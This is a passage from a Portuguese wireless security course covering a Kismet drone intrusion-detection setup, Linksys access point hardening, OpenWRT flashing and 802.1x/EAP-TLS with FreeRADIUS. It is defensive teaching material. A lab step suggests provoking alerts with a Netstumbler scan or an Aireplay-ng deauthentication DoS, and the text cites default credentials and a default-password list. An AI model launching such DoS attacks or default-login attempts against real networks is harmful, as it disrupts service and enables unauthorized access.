Para configurar o Kismet Server para operar com drones, inclua a seguinte linha no seu
arquivo kismet.conf (em “/usr/local/etc/” ):

source=kismet_drone,192.168.1.10:3501,d1

Lembre-se de salvar o arquivo de configuração.

Você pode configurar diversos drones – um para cada canal, por exemplo. A nomenclatura
d1, por exemplo, pode indicar um drone que opera apenas no canal 1.

Note que, uma vez que Kismet utiliza a interface WLAN em modo “monitor”, não é possível
usá-la para associação. Assim, a comunicação entre Kismet Server e Drone normalmente
ocorre por meio da rede cabeada.

Agora, seu WIDS está pronto. Basta iniciar o Kismet Drone seguido do Kismet Server para
visualizar os pacotes recebidos remotamente.

No Kismet Drone, execute:

# ifconfig wlan0 down

# rmmod rt73

# modprobe rt73
Segurança em Redes sem Fio

A interface Linksys WUSB54GC em especial normalmente exige que o módulo seja carre-
gado novamente para que a captura de Kismet (Server ou Drone) aconteça com sucesso.

154
Execute o comando kismet_drone, para acionar o Kismet Drone. Abaixo uma saída bem-sucedida:

bt etc # kismet_drone

Suid priv-dropping disabled. This may not be secure.

No specific sources given to be enabled, all will be enabled.

Disabling channel hopping.

Source 0 (drone1): Enabling monitor mode for rt73 source interface


rausb0 channel 1 ...

Source 0 (drone1): Opening rt73 source interface rausb0 ...

Kismet Drone 2007.10.R1 (Kismet)

Listening on port 3501 (protocol 9).

Allowing connections from 127.0.0.1/255.255.255.255

No Kismet Server, inicie o Kismet pelas opções de aplicativos ou execute:

# kismet

Para mais informações e opções, veja:

# man kismet_drone

# man kismet

Atividade 8.3 – Cobrindo todos os canais


Existem duas maneiras de varrer os canais: trocando de canais (hopping) ou monitorando o
máximo de canais simultaneamente.

Crie um WIDS com pelo menos três drones, de forma que cada um deles cuide de uma faixa
de canais. Enumere pelo menos duas vantagens de se monitorar o máximo de canais simul-
taneamente (dica: dwell time).

Se desejar que cada drone monitore apenas determinado canal (ex. 6), altere no arquivo
kismet_drone.conf de cada um dos drones:

source=rt73,rausb0,drone1,1

source=rt73,rausb0,drone2,2

source=rt73,rausb0,drone3,3

source=rt73,rausb0,drone4,4
Capítulo 8 - Roteiro de Atividades

O nome que se dá ao source (drone1, drone2, neste caso) é irrelevante para a exibição no
Kismet Client. O nome do source que aparece no painel do Kismet Client é configurado na
linha source do arquivo kismet.conf .

Para configurar drones que varrem todos os canais:

source=rt73,rausb0,drone1

channelhop=false

155
Atividade 8.4 – Alertas
O Kismet, atualmente, oferece 22 tipos de alertas diferentes que poderão ser visualizados
na barra de alertas, na parte inferior da interface gráfica:

11 AIRJACKSSID;

11 APSPOOF;

11 BSSTIMESTAMP;

11 CHANCHANGE;

11 CRYPTODROP;

11 DEAUTHFLOOD;

11 BCASTDISCON;

11 DHCPCLIENTID;

11 DHCPCONFLICT;

11 DISASSOCTRAFFIC;

11 DISCONCODEINVALID;

11 DEAUTHCODEINVALID;

11 DHCPNAMECHANGE;

11 DHCPOSCHANGE;

11 LONGSSID;

11 LUCENTTEST;

11 SFBCOMSSID;

11 MSFDLINKRATE;

11 MSFNETGEARBEACON;

11 NETSTUMBLER;

11 NULLPROBERESP;

11 PROBENOJOIN.

Provoque uma situação de alerta para seu WIDS recém-criado. Exemplos de ataque:
Netstumbler – Ataque de DoS com Aireplay-ng.
Segurança em Redes sem Fio

156
9
Implantando uma WLAN segura
(parte 1)
objetivos

Configurar um Access Point mais seguro com OpenWRT; configurar um AP comercial;


WPA2 Enterprise com RADIUS, WPA2 e EAP-TLS como método EAP e certificados
digitais para autenticação.

conceitos
WEP, WPA2 Personal (WPA2-PSK) e WPA2 Enterprise.

Introdução
11 Estudo de caso: Linksys WRT54GS. q
11 AP mais seguro com OpenWRT.

11 Implantando uma WLAN básica no modelo Personal.

Neste capítulo, abordaremos a segurança no Access Point, especificamente nos dispositivos da


marca Linksys série WRT54 – os mais populares do mercado SOHO (Small Office/Home Office).

Firmware Introduziremos também uma opção muito interessante: a substituição do firmware do


Conjunto de instruções fabricante por um alternativo. O firmware escolhido para o estudo de caso alternativo foi
operacionais progra-
o OpenWRT, por seus principais diferenciais, estabilidade e possibilidade de instalação
madas diretamente no
hardware de um equipa- de pacotes. Esse último diferencial permite que o AP seja capaz de atuar como servidor

Capítulo 9 - Implantando uma WLAN segura (parte 1)


mento eletrônico. RADIUS pela instalação do pacote FreeRADIUS, possibilitando a implantação de WPA/WPA2
Enterprise sem a necessidade de um servidor RADIUS externo. Outra funcionalidade que
se destaca é a possibilidade de se implantar um Intrusion Detection System (IDS) específico
para a camada 2 de 802.11 de forma distribuída, através da instalação de um Drone Kismet.

Segurança padrão no AP
Assim como outras opções de firmware (DD-WRT, por exemplo), OpenWRT oferece configu-
rações mais avançadas e flexíveis que o firmware original, tais como segmentação da rede,
automatização de tarefas e ajuste da potência de transmissão, bem como administração
remota segura por SSH (Secure Shell). Contudo, nem todos os APs suportam o upgrade,
devendo-se, antes, verificar a compatibilidade com o firmware escolhido. Nas práticas
subsequentes, configuraremos os APs com os firmwares comerciais já instalados.

157
Linksys e D-Link são padrão no mercado SOHO. q
Estudo de caso: Linksys WRT54GS.

11 Versão 3, Firmware v4.70.6.

11 802.11b/g com SpeedBooster/Afterburner.

Administração:

11 Exclusivamente por interface web.

11 Suporte a HTTPS.

Figura 9.1
WRT54GS.

Linksys, juntamente com D-Link, podem ser considerados padrões no mercado SOHO (Small
Office/Home Office). Essa característica, que os tornam acessíveis, juntamente com seus
recursos, fizeram com que o WRT54GS fosse o AP escolhido para as práticas.

A versão GS em particular possui uma diferença básica em relação à versão WRT54G: o


recurso SpeedBooster/Afterburner. De acordo com o fabricante, com esse recurso é possível
melhorar o desempenho de uma rede 802.11g em até 35%.

Uma característica típica desse tipo de dispositivo é a presença de um servidor web embu-
tido para permitir o gerenciamento da unidade. Nesse modelo em particular essa é a única
interface administrativa disponível de fábrica, que tem autenticação HTTP e suporte a
HTTPS para proteger o tráfego que carrega a senha de acesso.

Segurança sem fio


WEP. q
11 WEP-PSK (Personal).

11 Dynamic WEP, um “WEP Enterprise” com RADIUS/802.1x.

WPA.

11 WPA-PSK (Personal).

11 Enterprise.

WPA2 (802.11i).

11 Personal.

Esse Access Point foi lançado em 2004 e permite que se utilize todos os mecanismos
Segurança em Redes sem Fio

de segurança disponíveis no mercado: WEP, WPA e WPA2 em modelo Personal (PSK) e


Enterprise (com autenticação por 802.1x/RADIUS). O WRT54GS permite que se implante
segurança reforçada com a presença de um servidor RADIUS externo, que atua como
authentication server na arquitetura 802.1x.

Entretanto, essas não são as únicas configurações relacionadas à segurança. Veremos, a


seguir, como outras configurações, aparentemente administrativas, podem afetar a segu-
rança do dispositivo.

158
Figura 9.2 Configurações de segurança
q
Tela do WRT54GS:
configurações 11 Secure Easy Setup (SES).
relacionadas à
segurança. 11 SSID.

11 Wireless SSID Broadcast.

11 Wireless MAC Filter.

11 AP isolation.

A Linksys inclui, entre seus roteadores sem fio mais recentes, o recurso Secure Easy Setup
(SES). Trata-se de um utilitário instalado, no cliente, associado a um botão no AP que, uma
vez pressionado, configura de maneira automática uma rede WPA-PSK. Não trataremos
dessa configuração, uma vez que está voltada justamente para quem não quer conhecer
detalhes de redes sem fio.

A seleção do Service Set Identifier (SSID) é importante, pois um SSID mal selecionado pode
dar a um atacante informações importantes. O simples fato de não alterar o SSID já torna o
Capítulo 9 - Implantando uma WLAN segura (parte 1)
AP atraente, considerando que pode indicar um AP com configuração padrão – SSID Linksys
e com senha “admin” no caso do WRT54GS. Evite, também, escolher um SSID que diga algo
sobre sua organização – salas, andares e departamentos.

O broadcast do SSID pode ser desabilitado, de forma que somente quem conhecer o AP
poderá se associar a ele. Essa “proteção” é de pouca utilidade para conter atacantes, uma
vez que esse dado é divulgado em pacotes de associação e fácil de capturar.

Outro recurso normalmente associado à segurança é o filtro de acesso por endereço MAC.
Esse tipo de filtro pode conter um atacante menos experiente, mas não conterá aquele que
forjar seu endereço MAC – algo feito facilmente tanto em plataformas Linux quanto Windows.

159
11 Firewall, filtros de aplicação e DMZ. q
11 Administração:

22 Alteração de senha.

22 Habilitar HTTPS.

22 Habilitar ou desabilitar acesso administrativo a partir da rede sem fio.

22 Habilitar ou desabilitar gerenciamento a partir da interface externa.

Esse AP implementa alguns conceitos de segurança de redes de maneira simplificada:

11 Firewall: filtros simplificados por origem, destino e portas;

11 Filtros de aplicação: filtros por palavras-chave e URL;

11 DMZ: possibilidade de expor um host diretamente à rede de distribuição, que pode ser a
rede interna ou a internet, no caso do usuário doméstico.

O acesso à interface de administração deve ser feito apenas por usuários autorizados e,
para que isto aconteça, o AP implementa algumas medidas de controle de acesso.

É importante alterar a senha de acesso remoto logo que se configura o AP.


Senhas-padrão deste e de outros tipos de dispositivo de rede são facilmente encon-
tradas na web.

Outra maneira de proteger o acesso administrativo é habilitar o servidor web com HTTPS
e usar apenas esse protocolo de acesso. É possível, ainda, restringir ou permitir o acesso a
estações ligadas à LAN do AP. De forma semelhante, é possível restringir ou permitir o acesso
à interface administrativa a partir de hosts da rede cabeada à qual o AP está conectado.

Por padrão, um AP como esse não possui nem mesmo a possibilidade de se escolher um
usuário para o controle de acesso de HTTP – o que certamente permite ataques por força
bruta. Quanto menor for a exposição da interface administrativa, melhor – especialmente
em redes abertas.

Atualização de firmware
11 O AP também está sujeito a vulnerabilidades. q
11 Pode ser encarada como atualização de segurança.

11 Feita a partir da LAN do AP e não por HTTPS.

11 Não pode haver queda de energia durante o processo.

11 Permite instalação de firmwares alternativos.

Tal como sua estação Windows, que precisa de atualizações de segurança do Sistema Opera-
cional (SO), de antivírus, do anti-spyware e de diversos outros componentes do sistema, um
Segurança em Redes sem Fio

AP também necessita de atualizações, estas que corrigem falhas ou adicionam funcionali-


dades – assim como foi o caso da implementação de WPA1 que tinha, como restrição, operar
sobre o mesmo hardware de WEP.

Atualizar o firmware deve ser encarado como uma tarefa rotineira de segurança, especial-
mente porque são frequentes as vulnerabilidades descobertas nesse tipo de dispositivo.
Como exemplo, podemos citar o caso do próprio WRT54GS com firmware 4.50.6, que

160
apresentava uma vulnerabilidade que permitia que, mesmo definido o authentication type
(menu “Wireless” > “Advanced Wireless Settings”) para Auto ou Shared, o AP se comportava
como aberto – mesmo com WPA-PSK e TKIP habilitados.

A possibilidade de atualizar firmware é particularmente interessante para a instalação de


um firmware alternativo, como veremos mais adiante neste mesmo Capítulo.

Figura 9.3 AP mais seguro com OpenWRT


q
Tela para
atualização do 11 WRT54GS pode oferecer mais.
firmware do
WRT54GS. 11 Um dos melhores APs SOHO em recursos de hardware.

11 Versão 3.

22 8 MB Flash, 32 MB RAM e processador de 200 MHz.

22 Outras versões e WRT54G: menos Flash, menos RAM.

11 É possível aproveitar melhor seus recursos.

11 Solução: Linux.

Os Access Points da Linksys têm recursos de hardware abundantes em suas versões mais
antigas. As séries WRT54G e GS ficaram conhecidas por terem tido seu código-fonte libe- Capítulo 9 - Implantando uma WLAN segura (parte 1)

w
rado, satisfazendo às obrigações GNU GPL e permitindo o desenvolvimento de firmwares
alternativos baseados em Linux.

Conheça mais sobre o A partir da versão 5, lançada em abril de 2006, tanto a versão G como GS passaram a ter
OpenWRT (Table of firmware baseado em VxWorks e tiveram sua memória flash reduzida a um tamanho insu-
Hardware) e sobre os
hardwares Linksys em ficiente para a instalação dos firmwares baseados em Linux. Uma nova série foi lançada
“Linksys hardware (WRT54GL), que voltou a permitir a instalação de outros firmwares, com a desvantagem de
notes”.
oferecer apenas 4 MB e 16 MB de memória Flash e RAM, respectivamente. Esse modelo é
basicamente um WRT54G versão 4 – que ainda permite a instalação de Linux.

161
OpenWRT
11 Firmware alternative. q
11 Torna o AP um mini-PC com Linux.

11 Estende as funcionalidades do AP.

11 Compatível com vários equipamentos.

11 Não partiu do código-fonte do firmware original.

Outras opções:

11 DD-WRT.

11 HyperWRT.

OpenWRT é a opção mais interessante entre os firmwares alternativos disponíveis. Trans-


forma o AP em um mini PC com Linux, especialmente quando o dispositivo conta com mais
memória Flash e RAM – como é o caso do WRT54GS versão 3. Esse firmware é compatível
com diversos equipamentos, mas é nos modelos da Linksys que ele pode desenvolver
melhor suas funcionalidades.

Outras opções de firmware consagradas pelo uso, e mais voltadas para quem deseja uma
interface gráfica mais rica, são DD-WRT e HyperWRT.

Vantagens do OpenWRT
11 Gerenciamento melhorado: SSH, SNMP e possibilidade de automações por scripts. q
11 Mais parâmetros de configuração: nem tudo está na interface gráfica, ainda rudimentar.

11 Gerenciamento de pacotes: Snort, Drone Kismet, TCPdump, Nmap, RADIUS.

11 Arquitetura interna revelada.

11 Switch Ethernet, interface sem fio e chip do roteador que interliga.

11 Possibilidade de alterar a arquitetura interna.

O OpenWRT traz diversas vantagens, se for comparado com o firmware original da Linksys e
até mesmo com outros firmwares baseados em Linux:

11 Gerenciamento: é possível gerenciar o AP a partir de um terminal SSH ou pela tradicional


interface administrativa web. Além disso, lembre-se de que seu AP se torna um Linux, ou
seja, é possível automatizar tarefas por meio de scripts;

11 Monitoração: é possível implantar facilmente SNMP e Syslog para monitoração do dispo-


sitivo – o que irá ajudar na resolução de problemas e na própria monitoração;

11 Interface gráfica: oferece apenas os serviços básicos, em um design rudimentar. Assim


como em algumas aplicações Linux em computadores, tira-se mais do sistema na inter-
face Command Line Interface (CLI);

11 RADIUS: um aspecto que diferencia essa distribuição de firmware das demais é a possi-
Segurança em Redes sem Fio

bilidade de instalação de pacotes, que vão desde Snort e Nmap até um servidor RADIUS
– o que nos interessará, particularmente, no Capítulo 10. A possibilidade de RADIUS no
próprio AP elimina a necessidade de um authentication server dedicado, facilitando a
implantação de WPA e WPA2 Enterprise em ambientes mais modestos;

11 Linux: por meio de comandos comuns de Linux, como ifconfig, uname, iwconfig e brctl
(para controlar bridges), é possível entender com mais detalhes a arquitetura interna do
AP. Se não for suficiente, é possível alterar a arquitetura, segregando LAN e WLAN em
VLANs distintas, por exemplo.

162
CPU WRT54G v4
WRT54GS v3
OpenWrt

br0

eth1

WIFI
vlan0 vlan1 eth Access Point

Tagging

eth0
Porta interna

Porta WAN Portas LAN

Internet 1 2 3 4 Case Labels

Números de portas VLAN


5 4 3 2 1 0

Tagging vlan1 vlan0

Figura 9.4
Arquitetura do Switch
WRT54GS.

Por intermédio do diagrama da Figura 9.4 e de comandos de administração típicos de Linux,


é possível entender a arquitetura interna do AP. No caso de WRT54GS, trata-se de um switch

w Ethernet, de uma interface de rede sem fio e de um processador que os conecta. A LAN que,
por padrão, engloba WLAN e LAN em bridge, passa a ser separada da WAN que, no contexto
Para mais informações
sobre a arquitetura do AP, é o backbone ao qual ele é conectado. A LAN é representada pela interface vlan0 e a
interna do AP, que varia WAN, pela interface vlan1. A interface sem fio pode ser manipulada, tal como uma interface
conforme o fabricante
de uma estação Linux, pelo dispositivo eth1.
e o modelo em
questão, consulte a
Nesse ponto, lembre-se da configuração de uma estação Linux: o modo Master é o que
documentação de
OpenWRT: OpenWR- confere ao dispositivo a funcionalidade de AP. Alterar o modo da interface de rede do AP
Tdocs: Configuration 2. Capítulo 9 - Implantando uma WLAN segura (parte 1)
para Managed muda sua função para o cliente. Essa opção é interessante quando se deseja
Network Configuration.
transformar o AP naquilo que se costuma chamar de “extensor” – um dispositivo que possui
uma interface.

Instalação passo a passo


1. Verifique se seu AP é compatível: q
11 WRT54G/GS v5.x não são compatíveis.

2. Escolha o firmware correto:

11 SquashFS é o recomendado.

163
3. Selecione o método de instalação: q
11 HTTP.

22 Não utilize o modo HTTPS.

22 Conexão com AP por intermédio da interface LAN.

11 TFTP.

A instalação do OpenWRT é simples, mas deve ser feita com muita cautela (não será reali-
zada nas práticas deste curso). Uma falha no procedimento pode ser o suficiente para um AP
“bricked” – ou seja, inutilizável.

A instalação começa com algo simples: determinar se o AP permite a instalação do


OpenWRT, seja pelos recursos de memória necessários ou pela versão do hardware.
Lembre-se de que os APs Linksys WRT54G/GS da versão 5 não permitem a instalação de
OpenWRT até o momento. WRT54GS – a versão em que estamos nos baseando aqui – é
compatível com OpenWRT.
Uma vez determinada a compatibilidade, é hora de selecionar a versão que se deseja
instalar. Existem diversas imagens de firmware disponíveis no site do OpenWRT, e aquela
considerada como padrão está no diretório “bin” (“Index of /whiterussian/newest/”).

A versão “micro” oferece quantidade reduzida de pacotes disponíveis logo após o flashing
do firmware novo, inclusive sem interface gráfica administrativa. Devido aos recursos que
temos no WRT54GS v3, essa opção não se faz necessária.

A última etapa na escolha do firmware é decidir entre dois sistemas de arquivos: SquashFS
ou JFFS2. Recomenda-se a utilização de SquashFS que, apesar de ser um filesystem que
permite somente leitura, proporciona a impressão de um FS que permite escrita por meio
de uma partição secundária JFFS2. Essa partição, que permite somente leitura, tem uma
utilidade interessante: recuperar facilmente arquivos originais da instalação.
w
Mais informações sobre
Os modos de instalação mais comuns são pela interface web e por TFTP. É recomendado que a instalação por TFTP
podem ser obtidas em:
se utilize este último modo, embora exija que a variável de boot_wait da NVRAM esteja ativada Installing OpenWRT via
(boot_wait=on) – o que não constitui padrão em todos os equipamentos. Optaremos aqui pelo TFTP.
modo de instalação pela interface gráfica, um modo por meio do qual se obtém mais sucesso.
Segurança em Redes sem Fio

164
Instalação do firmware pela interface administrativa web

Figura 9.5 O modo de instalação por TFTP não é possível em todos os casos; por isso, ilustraremos a
Upload do instalação através da interface web. Alguns cuidados devem ser tomados antes de efetuar o
firmware.
upload do firmware selecionado:

11 Certifique-se de que a fonte de energia esteja bem instalada e de que a energia esteja
estável. Falta de energia durante o processo pode resultar em um AP “bricked”.

11 Conecte a estação ao AP por meio da rede cabeada, em uma das portas LAN disponíveis
(não a porta WAN). Defina um endereço estático na mesma rede do endereço do AP
(192.168.1.1) – 192.168.1.100 – com Subnet mask 255.255.255.0, por exemplo.

11 Certifique-se de que a conexão com a interface administrativa do AP não esteja sendo


feita por meio da rede sem fio. A maneira mais simples de fazer isso é desabilitar a inter-
face 802.11 da estação.

11 Certifique-se de que a conexão com o AP não esteja sendo feita com o servidor HTTPS do
dispositivo. Se for o caso, habilite novamente HTTP.

Uma vez seguidas todas estas recomendações, seu AP estará pronto para sofrer flashing. Em
seguida, pressione o botão “Upgrade” para prosseguir.
Capítulo 9 - Implantando uma WLAN segura (parte 1)
A utilização dos LEDs é levemente alterada no OpenWRT. Dispositivos com o LED “DMZ”
indicarão que o processo terminou, da seguinte forma:

11 O LED “Power” pisca e acende novamente no início do boot;

11 O processo de boot terá terminado quando o LED “DMZ” se apagar.

165
Segurança em Redes sem Fio

166
Roteiro de Atividades 9
11 Configuração pós-boot.

11 Configuração do AP por meio da interface web.

11 Configuração de uma WLAN WEP, WPA e WPA2 Personal (PSK).

O objetivo deste Roteiro de Atividades é instalar um AP (configurado de maneira segura)


para uma rede modelo Personal, baseada em uma chave pré-compartilhada (PSK) WEP, WPA
ou WPA2, além das demais funcionalidades de segurança oferecidas pelo AP (MAC filters).
Utilizaremos a interface web do firmware instalado pelo fabricante, e acompanharemos a
configuração de um AP. É possível experimentar configurações pelo emulador da interface
administrativa do Linksys WRT54G, disponível em:

http://stevehorbachuk.com/linksys

11 Usuário: admin

11 Senha: admin

No Capítulo 10, concluiremos o curso com conceitos de WPA2 (802.11i), 802.1x/RADIUS e


Extensible Authentication Protocol (EAP), que serão seguidos por um upgrade no AP que
será configurado com a implantação de uma WLAN em modelo Enterprise.

Atividade 9.1 – Configurações gerais de desempenho e segurança


Sempre que recebermos um novo AP, devemos verificar se a versão do firmware é a mais
recente. O firmware é o “Sistema Operacional” do seu AP, muitas vezes uma distribuição Linux
dedicada a gerenciar o AP. No caso de Linksys isso pode ser feito em: http://www.linksys.com/

Procure pela página do produto e pela opção firmware. Tenha em mãos os dados do hardware,
disponíveis na etiqueta localizada na parte inferior do aparelho. Você deve procurar por
modelo e versão do hardware (hardware version, h/w version).

Figura 9.6
Localização da
etiqueta.

Exemplo de arquivo de firmware:


Capítulo 9 - Roteiro de Atividades

WRT54Gv5v6_1.02.5.002_fw.bin

A versão instalada no AP normalmente é exibida à direita, no topo da interface web.


Se você constatar que a versão disponível é mais recente que a versão instalada em seu AP,
faça a instalação.

As configurações persistem depois da atualização do firmware, mas por segurança faça um


backup em arquivo pela opção “Administration – Config Management”.

167
Antes de realizar o upload do firmware:

1. Conecte seu desktop em uma das portas Ethernet. Em hipótese alguma realize a atuali-
zação através de um link 802.11, porque não é seguro. Se esse processo for interrompido,
existe a possibilidade de danos irreparáveis.

2. Configure um IP fixo no desktop, na mesma rede local do AP. Normalmente um IP como


192.168.1.100 é adequado.

A atualização é muito importante. Existem versões que permitem, por exemplo, a confi-
guração de parâmetros de um AP sem a necessidade de senha. Assim, um usuário com
o laptop associado ao AP é capaz de alterar a senha da interface administrativa e obter
controle sobre a rede.

Configurações adicionais:

11 Defina o time zone correto para que os logs sejam registrados adequadamente. Normal-
mente os APs sincronizam seu relógio automaticamente depois de ligados à internet com
sucesso. Essa opção está disponível nos aparelhos Linksys em “Setup – Basic Setup”.

Na aba “Administration”:

11 Altere a senha administrativa (muito importante). Existem diversas listas de senhas


padrão disponíveis na internet. Uma das listas é a do grupo Phenoelit:
http://www.phenoelit-us.org/dpl/dpl.html

11 Habilite somente HTTPS, se possível. Assim a captura da senha administrativa é dificultada.

11 Desabilite a opção “Wireless Access Web”. Dessa forma, o AP poderá ser administrado
somente pela porta Ethernet, ou seja, é necessário o acesso físico.

11 Desabilite a opção “Remote Management”. Dessa forma você não permite que a adminis-
tração seja feita a partir da interface WAN, que normalmente fica em contato com a internet.

11 Desabilite Universal Plug and Play (UPnP).

11 Em “Configurações adicionais wireless” (Wireless – Advanced Wireless Settings): se o AP


tiver a opção “AP Isolation”, habilite-a. Essa opção impede a comunicação entre clientes
associados ao AP, inibindo atividades maliciosas.

Atividade 9.2 – Configurando um AP com WPA ou WPA2 Personal


Nesta atividade, configuraremos um dos Access Points fornecidos pelo instrutor com um
nível de segurança aceitável para redes pessoais e de pequenas empresas, navegando pela
interface web de configuração.

Configure o AP como WPA2 Personal, utilizando AES como protocolo de cifragem. Defina
uma chave WPA2 compartilhada utilizando os critérios de segurança vistos durante o curso.
Escolha uma senha robusta para evitar ataques de dicionários. Uma senha longa e que use
todos os caracteres ASCII (símbolos, números, maiúsculas, minúsculas) é sua única proteção.
Segurança em Redes sem Fio

Verifique com o Kismet se a configuração está correta.

168
Atividade 9.3 – Configurações extras de segurança e desempenho
Em administração, altere o SSID default. Esse tipo de medida é especialmente importante para
redes WPA Personal, já que o ataque depende do SSID. Valores padrão auxiliam o atacante.

11 Escolha um canal de frequência que não esteja sendo utilizado por outro AP, na área de
alcance, com uma separação de canais o maior possível para os vizinhos.

11 Configure o AP para utilizar o MAC Filters. Coloque apenas a sua estação na lista de ende-
reços MAC permitidos e verifique a conexão. Verifique com um colega se um cliente com
um MAC diferente consegue se conectar ao AP.

11 Desabilite o broadcast de SSID e verifique se houve perda de conectividade. Lembre-se


de que essa não é uma medida de segurança, porque não oculta sua rede. Observe o que
muda no tráfego quando este parâmetro é habilitado.

11 Desabilite os protocolos que não são necessários (ex.: IEEE 802.11b), caso todas as placas
de sua rede utilizem 802.11g. Para melhor desempenho, configure a interface em modo
802.11b apenas (aba “Wireless – Basic Wireless Settings”).

11 Configure a potência do transmissor rádio em um valor suficiente para a área de cober-


tura desejada ou planejada em site survey. Um AP configurado de maneira segura não
precisa ter seu sinal contido.

Capítulo 9 - Roteiro de Atividades

169
Segurança em Redes sem Fio

170
10
Implantando uma WLAN segura
(parte 2)
Apresentar conceitos de arquitetura de autenticação; mostrar conceitos de autenticação
objetivos

802.1x e de sua implantação open source, além de FreeRADIUS; ensinar a implantação


de uma WLAN segura baseada em RADIUS, WPA2 e EAP-TLS, bem como em método EAP
e certificados digitais.

conceitos
EAP-TLS; FreeRADIUS; configuração WPA2 com RADIUS.

Introdução
No Capítulo 9, concluímos a instalação de um AP com WPA2-PSK, segurança suficiente para
um usuário doméstico ou microempresa. Com essa implementação, não é necessária a ins-
talação de um servidor de autenticação, além de estar disponível em qualquer AP comprado
nos últimos dois anos. Embora WPA2-PSK sofra do mesmo problema de WEP, a necessidade
de uma chave compartilhada torna superiores seus mecanismos de segurança.

Nível atual de segurança


AP configurado com WPA2-PSK. q
Vantagens:
Capítulo 10 - Implantando uma WLAN segura (parte 2)
11 Segurança suficiente para usuário doméstico.

22 Já existem ataques conhecidos contra WPA.

11 Não é necessário servidor de autenticação.

11 Possível mesmo sem OpenWRT.

Desvantagens:

11 Chave compartilhada: mesma chave para todos os usuários, segredo mantido por
pouco tempo.

11 Trocar PSK nos clientes é trabalhoso.

171
WPA foi criado pela Wi-Fi Alliance como resposta aos problemas de WEP. Para isso, intro-
duziu apenas parte (TKIP em vez de CCMP) do padrão 802.11i, que ainda estava em desen-
volvimento. Hoje, nem mesmo WPA-PSK, uma solução vigente para WEP até 2004, constitui
garantia de segurança, pois ferramentas como coWPAtty são capazes de quebrar a chave
pelo ataque de dicionário off-line. Ataque de dicionário
Consiste na cifragem
As desvantagens de WPA2 são as mesmas de qualquer sistema com senhas compartilhadas: das palavras de um
o risco presente de vazamento para usuários não autorizados. Outro aspecto negativo do dicionário e de compa-
uso de PSK é a dificuldade de distribuição de chaves junto aos clientes, um processo manual rações com os arquivos
de senhas de usuários.
e que dificulta a troca periódica de chaves.

Arquitetura de autenticação
IEEE 802.1x – Port Based Network Access Control. q
Servidor de autenticação externo.

11 FreeRADIUS.

22 Implementação de RADIUS (RFC 2865).

EAP-TLS como método EAP.

11 Extensible Authentication Protocol (EAP).

22 RFC 3748.

11 Necessidade de Infraestrutura de Chaves Públicas (ICP).

11 Necessidade de certificados no servidor RADIUS e nos clientes (autenticação mútua).

Para que se implemente 802.11i em sua totalidade – o que também é conhecido como
Robust Secure Network (RSN) –, é preciso ir além de WPA-PSK. Para isso, introduzimos mais
um elemento na infraestrutura: o servidor de autenticação 802.1x.

O padrão 802.1x não define o tipo de servidor de autenticação backend que deve ser utili-
zado, mas RADIUS pode ser considerado o padrão “de fato”. Existem diversas implemen-
tações de RADIUS, mas trataremos apenas da opção open source FreeRADIUS. Com ele, é
possível implantar RADIUS tanto como um servidor externo quanto no próprio AP.

O 802.1x usa o protocolo Extensible Authentication Protocol (EAP), que permite diversos
esquemas de autenticação: smart cards, Kerberos, chaves públicas, entre outros. O foco do
curso está no método EAP-TLS, que usa os protocolos de autenticação otimizados, pro-
vidos pelo protocolo EAP para autenticação, para um esquema de segurança ainda mais
seguro, quando associado com WPA2. O papel de Transport Layer Security (TLS), usado
para diversas aplicações como web e e-mail, é o de prover autenticação mútua, negociação
de algoritmos de criptografia com integridade protegida e troca de chaves entre cliente e
servidor RADIUS, evitando ataques como man-in-the-middle.

O EAP-TLS tem apenas uma desvantagem: a necessidade de uma Infraestrutura de


Segurança em Redes sem Fio

Chaves Públicas (ICP), uma vez que é necessária a presença de certificados no ser-
vidor de autenticação e no suplicante.

172
Servidor de autenticação
(RADIUS)
Rede sem fio

2
Au
thentica t or

Figura 10.1 Internet ou outros


Arquitetura de recursos LAN
3
autenticação de Supplicant
802.1x.

1. Supplicant solicita ao Authenticator (AP) acesso à rede. AP solicita identificação  ao


Supplicant. Neste ponto, apenas tráfego EAP é permitido.

2. Processo de autenticação tem início, utilizando EAP através de um túnel TLS.


O Authenticator repassa as credenciais para o Authentication Server.

3. Caso a autenticação tenha sucesso, Supplicant obtém acesso ao recurso de rede.

A arquitetura de autenticação de 802.1x é composta basicamente de três elementos: Supplicant,


Authenticator e Authentication Server. O papel do Supplicant é exercido pelos clientes, o de
Authenticator é exercido pelo AP e o de Authenticator Server, pelo servidor FreeRADIUS.

Primeiro o Supplicant solicita ao Authenticator (AP) acesso à rede. Em seguida, o AP solicita


as credenciais do Supplicant. Nesse ponto, apenas tráfego EAP (mais precisamente, EAP
encapsulation over LAN EAPOL) é permitido entre Supplicant e Authenticator. Somente após
esses passos o processo de autenticação é iniciado, utilizando EAP através de um túnel TLS.
Finalmente, o Authenticator repassa as credenciais para o Authentication Server. Caso a
autenticação tenha sucesso, Supplicant obtém acesso ao recurso de rede.

É bom lembrar que a segurança da rede fica a cargo de WPA2 após a autenticação: 802.1x
entra em ação somente nas autenticações inicial e periódicas (determinadas pelo AP) para
garantir a troca segura de chaves.

Outra observação importante é que o túnel TLS pode ser não formado diretamente Capítulo 10 - Implantando uma WLAN segura (parte 2)
entre cliente e Authentication Server (RADIUS): não aplicável quando é usado
FreeRADIUS.

802.1x e FreeRADIUS
11 FreeRADIUS como Authentication Server. q
11 Implementação open source de RADIUS para Unix.

11 Suporte a diversas fontes de autenticação.

22 Local (mais comum), /etc/passwd, LDAP, PAM, MySQL e outros SGBD.

173
11 Suporte a diversos tipos de métodos EAP: q
22 EAP-TTLS.

22 EAP-TLS.

22 LEAP.

22 PEAP.

Por que EAP-TLS?


Autenticação mútua por certificados digitais, não sofre com vulnerabilidades na q
autenticação por túnel.

11 Ataques Man-in-the-Middle (MITM).

A posse do certificado é condição para o acesso.

Suporte a EAP-TLS nos principais Sistemas Operacionais.

11 Nativo: MAC OS X, Windows 2000 SP4, Windows XP, Windows Mobile 2003 e supe-
riores, Windows CE 4.2.

11 Utilitário wpa_supplicant: Linux e BSD.

Embora imponha a complexidade de se manter uma ICP (Infraestrutura de Chaves Públicas),


EAP-TLS ainda é considerado um dos tipos de EAP mais seguros. Tanto clientes quanto servi-
dores de autenticação usam pares de chaves pública ou privada para autenticar usuários.

Uma das vantagens desse tipo EAP é a falta de necessidade de um diretório de usuários: as
credenciais do usuário passam a ser seu certificado e uma senha (opcional, dependendo da
implantação). Assim, a tarefa de administrar usuários se concentra na ICP, a mesma usada
para login na rede (single-sign-on), certificados para e-mail e outras aplicações. Para negar
acesso a um usuário, basta que se revogue seu certificado, a tarefa de manutenção de uma
Certificate Revogation List (CRL), parte de uma ICP estabelecida.

